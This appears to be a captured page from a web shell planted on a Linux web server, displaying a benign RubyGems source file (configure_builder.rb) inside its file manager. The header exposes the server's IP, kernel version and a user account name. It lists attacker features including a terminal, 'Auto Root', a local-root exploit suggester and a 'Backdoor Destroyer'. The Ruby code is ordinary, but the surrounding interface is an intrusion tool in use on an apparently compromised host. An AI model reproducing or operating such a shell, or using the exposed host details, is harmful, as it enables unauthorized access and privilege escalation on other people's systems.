Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.216.199
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
rubygems /
rubygems /
ext /
Delete
Unzip
Name
Size
Permission
Date
Action
cargo_builder
[ DIR ]
drwxr-xr-x
2025-05-17 06:02
build_error.rb
179
B
-rw-r--r--
2025-03-20 14:09
builder.rb
7.11
KB
-rw-r--r--
2025-03-20 14:09
cargo_builder.rb
10.1
KB
-rw-r--r--
2025-03-20 14:09
cmake_builder.rb
667
B
-rw-r--r--
2025-03-20 14:09
configure_builder.rb
772
B
-rw-r--r--
2025-03-20 14:09
ext_conf_builder.rb
2.55
KB
-rw-r--r--
2025-03-20 14:09
rake_builder.rb
1.05
KB
-rw-r--r--
2025-03-20 14:09
Save
Rename
# frozen_string_literal: true #-- # Copyright 2006 by Chad Fowler, Rich Kilmer, Jim Weirich and others. # All rights reserved. # See LICENSE.txt for permissions. #++ class Gem::Ext::ConfigureBuilder < Gem::Ext::Builder def self.build(extension, dest_path, results, args=[], lib_dir=nil, configure_dir=Dir.pwd, target_rbconfig=Gem.target_rbconfig) if target_rbconfig.path warn "--target-rbconfig is not yet supported for configure-based extensions. Ignoring" end unless File.exist?(File.join(configure_dir, "Makefile")) cmd = ["sh", "./configure", "--prefix=#{dest_path}", *args] run cmd, results, class_name, configure_dir end make dest_path, results, configure_dir, target_rbconfig: target_rbconfig results end end